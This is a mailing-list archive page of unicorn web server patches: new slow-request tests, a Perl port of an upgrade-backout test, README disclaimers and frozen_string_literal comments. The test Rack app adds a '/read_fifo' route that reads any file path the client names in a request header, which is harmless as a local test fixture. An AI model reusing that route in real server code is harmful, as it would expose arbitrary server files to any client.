diff --git a/t/integration.ru b/t/integration.ru
index a6b022a..aaed608 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -87,6 +87,7 @@ def rack_input_tests(env)
   [ 200, h, [ dig.hexdigest ] ]
 end
 
+$nr_aborts = 0
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -101,7 +102,10 @@ def rack_input_tests(env)
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
     when '/broken_app'; raise RuntimeError, 'hello'
+    when '/aborted'; $nr_aborts += 1; [ 200, {}, [] ]
+    when '/nr_aborts'; [ 200, { 'nr-aborts' => "#$nr_aborts" }, [] ]
     when '/nil'; nil
+    when '/read_fifo'; [ 200, {}, [ File.read(env['HTTP_READ_FIFO']) ] ]
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3b1d6df..2d448cd 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -405,6 +405,39 @@ EOM
 	my $wpid = readline($fifo_fh);
 	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
 	$ck_early_hints->('ccc on');
+
+	$c = tcp_start $srv, 'GET /env_dump HTTP/1.0';
+	vec(my $rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out env_dump';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	ok $hdr, 'got all headers';
+
+	# start a slow TCP request
+	my $rfifo = "$tmpdir/rfifo";
+	mkfifo_die $rfifo;
+	$c = tcp_start $srv, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	tcp_start $srv, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'TFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'TFIN', 'got slow response from TCP socket';
+
+	# slow Unix socket request
+	$c = unix_start $u1, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	vec($rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out Unix CCC';
+	unix_start $u1, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'UFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'UFIN', 'got slow response from Unix socket';
+
+	($status, $hdr, $bdy) = do_req $srv, 'GET /nr_aborts HTTP/1.0';
+	like "@$hdr", qr/nr-aborts: 0\b/,
+		'aborted connections unseen by Rack app';
 }
 
 if ('max_header_len internal API') {
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
deleted file mode 100644
index a0a2bff..0000000
--- a/test/unit/test_ccc.rb
+++ /dev/null
@@ -1,92 +0,0 @@
-# frozen_string_literal: false
-require 'socket'
-require 'unicorn'
-require 'io/wait'
-require 'tempfile'
-require 'test/unit'
-require './test/test_helper'
-
-class TestCccTCPI < Test::Unit::TestCase
-  def test_ccc_tcpi
-    start_pid = $$
-    host = '127.0.0.1'
-    srv = TCPServer.new(host, 0)
-    port = srv.addr[1]
-    err = Tempfile.new('unicorn_ccc')
-    rd, wr = IO.pipe
-    sleep_pipe = IO.pipe
-    pid = fork do
-      sleep_pipe[1].close
-      reqs = 0
-      rd.close
-      worker_pid = nil
-      app = lambda do |env|
-        worker_pid ||= begin
-          at_exit { wr.write(reqs.to_s) if worker_pid == $$ }
-          $$
-        end
-        reqs += 1
-
-        # will wake up when writer closes
-        sleep_pipe[0].read if env['PATH_INFO'] == '/sleep'
-
-        [ 200, {'content-length'=>'0', 'content-type'=>'text/plain'}, [] ]
-      end
-      ENV['UNICORN_FD'] = srv.fileno.to_s
-      opts = {
-        listeners: [ "#{host}:#{port}" ],
-        stderr_path: err.path,
-        check_client_connection: true,
-      }
-      uni = Unicorn::HttpServer.new(app, opts)
-      uni.start.join
-    end
-    wr.close
-
-    # make sure the server is running, at least
-    client = tcp_socket(host, port)
-    client.write("GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
-    assert client.wait(10), 'never got response from server'
-    res = client.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of response, server is ready'
-    client.close
-
-    # start a slow request...
-    sleeper = tcp_socket(host, port)
-    sleeper.write("GET /sleep HTTP/1.1\r\nHost: example.com\r\n\r\n")
-
-    # and a bunch of aborted ones
-    nr = 100
-    nr.times do |i|
-      client = tcp_socket(host, port)
-      client.write("GET /collections/#{rand(10000)} HTTP/1.1\r\n" \
-                   "Host: example.com\r\n\r\n")
-      client.close
-    end
-    sleep_pipe[1].close # wake up the reader in the worker
-    res = sleeper.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first sleeper response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of sleeper response'
-    sleeper.close
-    kpid = pid
-    pid = nil
-    Process.kill(:QUIT, kpid)
-    _, status = Process.waitpid2(kpid)
-    assert status.success?
-    reqs = rd.read.to_i
-    warn "server got #{reqs} requests with #{nr} CCC aborted\n" if $DEBUG
-    assert_operator reqs, :<, nr
-    assert_operator reqs, :>=, 2, 'first 2 requests got through, at least'
-  ensure
-    return if start_pid != $$
-    srv.close if srv
-    if pid
-      Process.kill(:QUIT, pid)
-      _, status = Process.waitpid2(pid)
-      assert status.success?
-    end
-    err.close! if err
-    rd.close if rd
-  end
-end

^ permalink raw reply related	[relevance 1%]

* [PATCH 0/4] a small pile of patches
@ 2024-03-23 19:45  1% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2024-03-23 19:45 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4446 bytes --]

Some stuff to future-proof against future Ruby incompatibilities.
More coming....

I've also pushed out preliminary work (started in 2021) to the
`pico' branch to switch the HTTP parser from Ragel to
picohttpparser.  It will simplify the build + maintenance,
especially when distros carry different Ragel versions (or don't
package it all, as some hackers can't afford bandwidth and disk
for a C++ toolchain).

Other notes: New releases will probably be hosted on yhbt.net if
the Rubygems.org MFA threshold is reached.  Caring about the
identity of hackers is totally misguided when we already show
our code (and even document it!).  If you can't audit the code
yourself, get an actual professional to do it and don't bother
amateurs like me.

Eric Wong (4):
  t/integration: disable proxies when running curl(1)
  tests: port back-out-of-upgrade to Perl 5
  doc: various updates and disclaimers
  treewide: future-proof frozen_string_literal changes

 HACKING                             |  13 +++-
 README                              |   9 +++
 Rakefile                            |   1 +
 TODO                                |   4 +-
 bin/unicorn                         |   1 +
 bin/unicorn_rails                   |   1 +
 examples/big_app_gc.rb              |   1 +
 examples/echo.ru                    |   1 +
 examples/logger_mp_safe.rb          |   1 +
 examples/unicorn.conf.minimal.rb    |   1 +
 examples/unicorn.conf.rb            |   1 +
 ext/unicorn_http/extconf.rb         |   1 +
 lib/unicorn.rb                      |   1 +
 lib/unicorn/app/old_rails.rb        |   1 +
 lib/unicorn/app/old_rails/static.rb |   1 +
 lib/unicorn/cgi_wrapper.rb          |   1 +
 lib/unicorn/configurator.rb         |   1 +
 lib/unicorn/const.rb                |   1 +
 lib/unicorn/http_request.rb         |   1 +
 lib/unicorn/http_response.rb        |   1 +
 lib/unicorn/http_server.rb          |   1 +
 lib/unicorn/launcher.rb             |   1 +
 lib/unicorn/oob_gc.rb               |   1 +
 lib/unicorn/preread_input.rb        |   1 +
 lib/unicorn/select_waiter.rb        |   1 +
 lib/unicorn/socket_helper.rb        |   1 +
 lib/unicorn/stream_input.rb         |   1 +
 lib/unicorn/tee_input.rb            |   1 +
 lib/unicorn/tmpio.rb                |   1 +
 lib/unicorn/util.rb                 |   1 +
 lib/unicorn/worker.rb               |   1 +
 setup.rb                            |   1 +
 t/back-out-of-upgrade.t             |  44 +++++++++++
 t/broken-app.ru                     |   1 +
 t/client_body_buffer_size.ru        |   1 +
 t/detach.ru                         |   1 +
 t/env.ru                            |   1 +
 t/fails-rack-lint.ru                |   1 +
 t/heartbeat-timeout.ru              |   1 +
 t/integration.ru                    |   1 +
 t/integration.t                     |   1 +
 t/lib.perl                          |  67 ++++++++++++++---
 t/listener_names.ru                 |   1 +
 t/oob_gc.ru                         |   1 +
 t/oob_gc_path.ru                    |   1 +
 t/pid.ru                            |   1 +
 t/preread_input.ru                  |   1 +
 t/reopen-logs.ru                    |   1 +
 t/t0008-back_out_of_upgrade.sh      | 110 ----------------------------
 t/t0013.ru                          |   1 +
 t/t0014.ru                          |   1 +
 t/t0301.ru                          |   1 +
 test/aggregate.rb                   |   1 +
 test/benchmark/dd.ru                |   1 +
 test/benchmark/ddstream.ru          |   1 +
 test/benchmark/readinput.ru         |   1 +
 test/benchmark/stack.ru             |   1 +
 test/exec/test_exec.rb              |   1 +
 test/test_helper.rb                 |   1 +
 test/unit/test_ccc.rb               |   1 +
 test/unit/test_configurator.rb      |   1 +
 test/unit/test_droplet.rb           |   1 +
 test/unit/test_http_parser.rb       |   1 +
 test/unit/test_http_parser_ng.rb    |   1 +
 test/unit/test_request.rb           |   1 +
 test/unit/test_server.rb            |   1 +
 test/unit/test_signals.rb           |   1 +
 test/unit/test_socket_helper.rb     |   1 +
 test/unit/test_stream_input.rb      |   1 +
 test/unit/test_tee_input.rb         |   1 +
 test/unit/test_util.rb              |   1 +
 test/unit/test_waiter.rb            |   1 +
 unicorn.gemspec                     |   1 +
 73 files changed, 188 insertions(+), 126 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

[-- Attachment #2: 0001-t-integration-disable-proxies-when-running-curl-1.patch --]
[-- Type: text/x-diff, Size: 737 bytes --]

From f3acce5dce62ac4b0288d3c0ddf0a6db2cbd9e7f Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Tue, 9 Jan 2024 21:35:08 +0000
Subject: [PATCH 1/4] t/integration: disable proxies when running curl(1)

This was also done in t/test-lib.sh, but using '*' is more
encompassing.
---
 t/integration.t | 1 +
 1 file changed, 1 insertion(+)

diff --git a/t/integration.t b/t/integration.t
index 7310ff2..d17ace0 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,6 +27,7 @@ listen "$u1"
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $u_conf, { 3 => $srv });
 my $curl = which('curl');
+local $ENV{NO_PROXY} = '*'; # for curl
 my $fifo = "$tmpdir/fifo";
 POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (

[-- Attachment #3: 0002-tests-port-back-out-of-upgrade-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8889 bytes --]

From 724fb631c76f09964ec289ee8e144886ba15d380 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 6 Nov 2023 05:45:29 +0000
Subject: [PATCH 2/4] tests: port back-out-of-upgrade to Perl 5

Another place where we can be faster without adding more
dependencies on Ruby maintaining stable behavior.
---
 t/back-out-of-upgrade.t        |  44 +++++++++++++
 t/lib.perl                     |  67 +++++++++++++++++---
 t/t0008-back_out_of_upgrade.sh | 110 ---------------------------------
 3 files changed, 102 insertions(+), 119 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

diff --git a/t/back-out-of-upgrade.t b/t/back-out-of-upgrade.t
new file mode 100644
index 0000000..cf3b09f
--- /dev/null
+++ b/t/back-out-of-upgrade.t
@@ -0,0 +1,44 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# test backing out of USR2 upgrade
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $srv = tcp_server();
+mkfifo_die $fifo;
+write_file '>', $u_conf, <<EOM;
+preload_app true
+stderr_path "$err_log"
+pid "$pid_file"
+after_fork { |s,w| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+my $ar = unicorn(qw(-E none t/pid.ru -c), $u_conf, { 3 => $srv });
+
+like(my $wpid_orig_1 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker pid');
+
+ok $ar->do_kill('USR2'), 'USR2 to start upgrade';
+ok $ar->do_kill('WINCH'), 'drop old worker';
+
+like(my $wpid_new = slurp($fifo), qr/\Apid=\d+\z/a, 'got pid from new master');
+chomp(my $new_pid = slurp($pid_file));
+isnt $new_pid, $ar->{pid}, 'PID file changed';
+chomp(my $pid_oldbin = slurp("$pid_file.oldbin"));
+is $pid_oldbin, $ar->{pid}, '.oldbin PID valid';
+
+ok $ar->do_kill('HUP'), 'HUP old master';
+like(my $wpid_orig_2 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker new pid');
+ok kill('QUIT', $new_pid), 'abort old master';
+kill_until_dead $new_pid;
+
+my ($st, $hdr, $req_pid) = do_req $srv, 'GET /';
+chomp $req_pid;
+is $wpid_orig_2, "pid=$req_pid", 'new worker on old worker serves';
+
+ok !-f "$pid_file.oldbin", '.oldbin PID file gone';
+chomp(my $old_pid = slurp($pid_file));
+is $old_pid, $ar->{pid}, 'PID file restored';
+
+my @log = grep !/ERROR -- : reaped .*? exec\(\)-ed/, slurp($err_log);
+check_stderr @log;
+undef $tmpdir;
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 9254b23..b20a2c6 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -6,30 +6,58 @@ use v5.14;
 use parent qw(Exporter);
 use autodie;
 use Test::More;
+use Socket qw(SOMAXCONN);
 use Time::HiRes qw(sleep time);
 use IO::Socket::INET;
+use IO::Socket::UNIX;
+use Carp qw(croak);
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh, $err_log, $u_sock, $u_conf, $daemon_pid,
-	$pid_file);
+	$pid_file, $wtest_sock, $fifo);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn
 	$tmpdir $errfh $err_log $u_sock $u_conf $daemon_pid $pid_file
+	$wtest_sock $fifo
 	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr
-	do_req stop_daemon sleep time);
+	do_req stop_daemon sleep time mkfifo_die kill_until_dead write_file);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+
+$wtest_sock = "$tmpdir/wtest.sock";
 $err_log = "$tmpdir/err.log";
 $pid_file = "$tmpdir/pid";
+$fifo = "$tmpdir/fifo";
 $u_sock = "$tmpdir/u.sock";
 $u_conf = "$tmpdir/u.conf.rb";
 open($errfh, '>>', $err_log);
 
+if (my $t = $ENV{TAIL}) {
+	my @tail = $t =~ /tail/ ? split(/\s+/, $t) : (qw(tail -F));
+	push @tail, $err_log;
+	my $pid = fork;
+	if ($pid == 0) {
+		open STDOUT, '>&', \*STDERR;
+		exec @tail;
+		die "exec(@tail): $!";
+	}
+	say "# @tail";
+	sleep 0.2;
+	UnicornTest::AutoReap->new($pid);
+}
+
+sub kill_until_dead ($;%) {
+	my ($pid, %opt) = @_;
+	my $tries = $opt{tries} // 1000;
+	my $sig = $opt{sig} // 0;
+	while (CORE::kill($sig, $pid) && --$tries) { sleep(0.01) }
+	$tries or croak "PID: $pid died after signal ($sig)";
+}
+
 sub stop_daemon (;$) {
 	my ($is_END) = @_;
 	kill('TERM', $daemon_pid);
-	my $tries = 1000;
-	while (CORE::kill(0, $daemon_pid) && --$tries) { sleep(0.01) }
+	kill_until_dead $daemon_pid;
 	if ($is_END && CORE::kill(0, $daemon_pid)) { # after done_testing
 		CORE::kill('KILL', $daemon_pid);
 		die "daemon_pid=$daemon_pid did not die";
@@ -44,8 +72,9 @@ END {
 	stop_daemon(1) if defined $daemon_pid;
 };
 
-sub check_stderr () {
-	my @log = slurp($err_log);
+sub check_stderr (@) {
+	my @log = @_;
+	slurp($err_log) if !@log;
 	diag("@log") if $ENV{V};
 	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 	@err = grep(!/failed to set accept_filter=/, @err);
@@ -63,6 +92,16 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+sub unix_server (;$@) {
+	my $l = shift // $u_sock;
+	IO::Socket::UNIX->new(Listen => SOMAXCONN, Local => $l, Blocking => 0,
+				Type => SOCK_STREAM, @_);
+}
+
+sub unix_connect ($) {
+	IO::Socket::UNIX->new(Peer => $_[0], Type => SOCK_STREAM);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
@@ -95,8 +134,7 @@ sub tcp_host_port {
 
 sub unix_start ($@) {
 	my ($dst, @req) = @_;
-	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
-		BAIL_OUT "unix connect $dst: $!";
+	my $s = unix_connect($dst) or BAIL_OUT "unix connect $dst: $!";
 	$s->autoflush(1);
 	print $s @req, "\r\n\r\n" if @req;
 	$s;
@@ -201,7 +239,7 @@ sub unicorn {
 	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
 	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
 	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
-	state $exe = File::Spec->rel2abs('bin/unicorn');
+	state $exe = File::Spec->rel2abs("test/$eng-$ver/bin/unicorn");
 	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
 	UnicornTest::AutoReap->new($pid);
 }
@@ -219,6 +257,17 @@ sub do_req ($@) {
 	($status, $hdr, $bdy);
 }
 
+sub mkfifo_die ($;$) {
+	POSIX::mkfifo($_[0], $_[1] // 0600) or croak "mkfifo: $!";
+}
+
+sub write_file ($$@) { # mode, filename, LIST (for print)
+	open(my $fh, shift, shift);
+	print $fh @_;
+	# return $fh for futher writes if user wants it:
+	defined(wantarray) && !wantarray ? $fh : close $fh;
+}
+
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
diff --git a/t/t0008-back_out_of_upgrade.sh b/t/t0008-back_out_of_upgrade.sh
deleted file mode 100755
index 96d4057..0000000
--- a/t/t0008-back_out_of_upgrade.sh
+++ /dev/null
@@ -1,110 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 13 "backout of USR2 upgrade"
-
-worker_wait_start () {
-	test xSTART = x"$(cat $fifo)"
-	unicorn_pid=$(cat $pid)
-}
-
-t_begin "setup and start" && {
-	unicorn_setup
-	rm -f $pid.oldbin
-
-cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  # test script will block while reading from $fifo,
-  # so notify the script on the first worker we spawn
-  # by opening the FIFO
-  if worker.nr == 0
-    File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-  end
-end
-EOF
-	unicorn -D -c $unicorn_config pid.ru
-	worker_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "read original worker pid" && {
-	orig_worker_pid=$(curl -sSf http://$listen/)
-	test -n "$orig_worker_pid" && kill -0 $orig_worker_pid
-}
-
-t_begin "upgrade to new master" && {
-	kill -USR2 $orig_master_pid
-}
-
-t_begin "kill old worker" && {
-	kill -WINCH $orig_master_pid
-}
-
-t_begin "wait for new worker to start" && {
-	worker_wait_start
-	test $unicorn_pid -ne $orig_master_pid
-	new_master_pid=$unicorn_pid
-}
-
-t_begin "old master pid is stashed in $pid.oldbin" && {
-	test -s "$pid.oldbin"
-	test $orig_master_pid -eq $(cat $pid.oldbin)
-}
-
-t_begin "ensure old worker is no longer running" && {
-	i=0
-	while kill -0 $orig_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "capture pid of new worker" && {
-	new_worker_pid=$(curl -sSf http://$listen/)
-}
-
-t_begin "reload old master process" && {
-	kill -HUP $orig_master_pid
-	worker_wait_start
-}
-
-t_begin "gracefully kill new master and ensure it dies" && {
-	kill -QUIT $new_master_pid
-	i=0
-	while kill -0 $new_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid.oldbin does not exist" && {
-	i=0
-	while test -s $pid.oldbin
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-	while ! test -s $pid
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid is correct" && {
-	cur_master_pid=$(cat $pid)
-	test $orig_master_pid -eq $cur_master_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $orig_master_pid
-}
-
-dbgcat r_err
-
-t_done

[-- Attachment #4: 0003-doc-various-updates-and-disclaimers.patch --]
[-- Type: text/x-diff, Size: 3343 bytes --]

From 69d15a7a51a096b6acf00ccf23e1b988076d3b5f Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Mon, 1 Jan 2024 10:43:13 +0000
Subject: [PATCH 3/4] doc: various updates and disclaimers

Covering my ass from draconian legislation.
---
 HACKING | 13 +++++++++----
 README  |  9 +++++++++
 TODO    |  4 +---
 3 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/HACKING b/HACKING
index 5aca83e..777e75e 100644
--- a/HACKING
+++ b/HACKING
@@ -6,6 +6,8 @@ Like Mongrel, we use Ruby where it makes sense, and Ragel with C where
 it helps performance.  All of the code that actually runs your Rack
 application is written Ruby, Ragel or C.
 
+Ragel may be dropped in favor of a picohttpparser-based one in the future.
+
 As far as tests and documentation goes, we're not afraid to embrace Unix
 and use traditional Unix tools where they make sense and get the job
 done.
@@ -16,6 +18,9 @@ Tests are good, but slow tests make development slow, so we make tests
 faster (in parallel) with GNU make (instead of Rake) and avoiding
 RubyGems.
 
+New tests are written in Perl 5 and use TAP <https://testanything.org/>
+to ensure stability and immunity from Ruby incompatibilities.
+
 Users of GNU-based systems (such as GNU/Linux) usually have GNU make
 installed as "make" instead of "gmake".
 
@@ -69,10 +74,10 @@ supported by the versions of Ruby we target.
 
 === Ragel Compatibility
 
-We target the latest released version of Ragel and will update our code
-to keep up with new releases.  Packaged tarballs and gems include the
-generated source code so they will remain usable if compatibility is
-broken.
+We target the latest released version of Ragel in Debian and will update
+our code to keep up with new releases.  Packaged tarballs and gems
+include the generated source code so they will remain usable if
+compatibility is broken.
 
 == Contributing
 
diff --git a/README b/README
index 84c0fdf..b60ed00 100644
--- a/README
+++ b/README
@@ -122,6 +122,7 @@ supported.  Run `unicorn -h` to see command-line options.
 
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and maybe someone can fix it.
+No commercial support will ever be provided by the amateur maintainer.
 
 unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
@@ -132,6 +133,14 @@ damage done to the entire Ruby ecosystem.  Its unintentional popularity
 set Ruby back decades in parallelism, concurrency and robustness since
 it prolongs and proliferates the existence of poorly-written code.
 
+unicorn hackers are NOT responsible for your supply chain security:
+read and understand it yourself or get someone you trust to audit it.
+Malicious commits and releases will be made if under duress.  The only
+defense you'll ever have is from reviewing the source code.
+
+No user or contributor will ever be expected to sacrifice their own
+security by running JavaScript or revealing any personal information.
+
 == Contact
 
 All feedback (bug reports, user/development dicussion, patches, pull
diff --git a/TODO b/TODO
index ebbccdc..a3b18fd 100644
--- a/TODO
+++ b/TODO
@@ -1,3 +1 @@
-* Documentation improvements
-
-* improve test suite
+* improve test suite (port to Perl 5 for stability and maintainability)

[-- Attachment #5: 0004-treewide-future-proof-frozen_string_literal-changes.patch --]
[-- Type: text/x-diff, Size: 24100 bytes --]

From ccf2443901c18ffb26b2785f52d921005e862167 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Thu, 8 Feb 2024 12:16:31 +0000
Subject: [PATCH 4/4] treewide: future-proof frozen_string_literal changes

Once again Ruby seems ready to introduce more incompatibilities
and force busywork upon maintainers[1].  In order to avoid
incompatibilities in the future, I used a Perl script[2] to
prepend `frozen_string_literal: false' to every Ruby file.

Somebody interested will have to go through every Ruby source
file and enable frozen_string_literal once they've thoroughly
verified it's safe to do so.

[1] https://bugs.ruby-lang.org/issues/20205
[2] https://yhbt.net/add-fsl.git/74d7689/s/?b=add-fsl.perl
---
 Rakefile                            | 1 +
 bin/unicorn                         | 1 +
 bin/unicorn_rails                   | 1 +
 examples/big_app_gc.rb              | 1 +
 examples/echo.ru                    | 1 +
 examples/logger_mp_safe.rb          | 1 +
 examples/unicorn.conf.minimal.rb    | 1 +
 examples/unicorn.conf.rb            | 1 +
 ext/unicorn_http/extconf.rb         | 1 +
 lib/unicorn.rb                      | 1 +
 lib/unicorn/app/old_rails.rb        | 1 +
 lib/unicorn/app/old_rails/static.rb | 1 +
 lib/unicorn/cgi_wrapper.rb          | 1 +
 lib/unicorn/configurator.rb         | 1 +
 lib/unicorn/const.rb                | 1 +
 lib/unicorn/http_request.rb         | 1 +
 lib/unicorn/http_response.rb        | 1 +
 lib/unicorn/http_server.rb          | 1 +
 lib/unicorn/launcher.rb             | 1 +
 lib/unicorn/oob_gc.rb               | 1 +
 lib/unicorn/preread_input.rb        | 1 +
 lib/unicorn/select_waiter.rb        | 1 +
 lib/unicorn/socket_helper.rb        | 1 +
 lib/unicorn/stream_input.rb         | 1 +
 lib/unicorn/tee_input.rb            | 1 +
 lib/unicorn/tmpio.rb                | 1 +
 lib/unicorn/util.rb                 | 1 +
 lib/unicorn/worker.rb               | 1 +
 setup.rb                            | 1 +
 t/broken-app.ru                     | 1 +
 t/client_body_buffer_size.ru        | 1 +
 t/detach.ru                         | 1 +
 t/env.ru                            | 1 +
 t/fails-rack-lint.ru                | 1 +
 t/heartbeat-timeout.ru              | 1 +
 t/integration.ru                    | 1 +
 t/listener_names.ru                 | 1 +
 t/oob_gc.ru                         | 1 +
 t/oob_gc_path.ru                    | 1 +
 t/pid.ru                            | 1 +
 t/preread_input.ru                  | 1 +
 t/reopen-logs.ru                    | 1 +
 t/t0013.ru                          | 1 +
 t/t0014.ru                          | 1 +
 t/t0301.ru                          | 1 +
 test/aggregate.rb                   | 1 +
 test/benchmark/dd.ru                | 1 +
 test/benchmark/ddstream.ru          | 1 +
 test/benchmark/readinput.ru         | 1 +
 test/benchmark/stack.ru             | 1 +
 test/exec/test_exec.rb              | 1 +
 test/test_helper.rb                 | 1 +
 test/unit/test_ccc.rb               | 1 +
 test/unit/test_configurator.rb      | 1 +
 test/unit/test_droplet.rb           | 1 +
 test/unit/test_http_parser.rb       | 1 +
 test/unit/test_http_parser_ng.rb    | 1 +
 test/unit/test_request.rb           | 1 +
 test/unit/test_server.rb            | 1 +
 test/unit/test_signals.rb           | 1 +
 test/unit/test_socket_helper.rb     | 1 +
 test/unit/test_stream_input.rb      | 1 +
 test/unit/test_tee_input.rb         | 1 +
 test/unit/test_util.rb              | 1 +
 test/unit/test_waiter.rb            | 1 +
 unicorn.gemspec                     | 1 +
 66 files changed, 66 insertions(+)

diff --git a/Rakefile b/Rakefile
index 37569ce..fe1588b 100644
--- a/Rakefile
+++ b/Rakefile
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # optional rake-compiler support in case somebody needs to cross compile
 begin
   mk = "ext/unicorn_http/Makefile"
diff --git a/bin/unicorn b/bin/unicorn
index 00c8464..af8353c 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 
diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index 354c1df..374fd8e 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 require 'fileutils'
diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index c1bae10..0baea26 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,3 @@
+# frozen_string_literal: false
 # see {Unicorn::OobGC}[https://yhbt.net/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/echo.ru b/examples/echo.ru
index e982180..453a5e6 100644
--- a/examples/echo.ru
+++ b/examples/echo.ru
@@ -1,4 +1,5 @@
 #\-E none
+# frozen_string_literal: false
 #
 # Example application that echoes read data back to the HTTP client.
 # This emulates the old echo protocol people used to run.
diff --git a/examples/logger_mp_safe.rb b/examples/logger_mp_safe.rb
index 05ad3fa..f2c0500 100644
--- a/examples/logger_mp_safe.rb
+++ b/examples/logger_mp_safe.rb
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # Multi-Processing-safe monkey patch for Logger
 #
 # This monkey patch fixes the case where "preload_app true" is used and
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 46fd634..4f96ede 100644
--- a/examples/unicorn.conf.minimal.rb
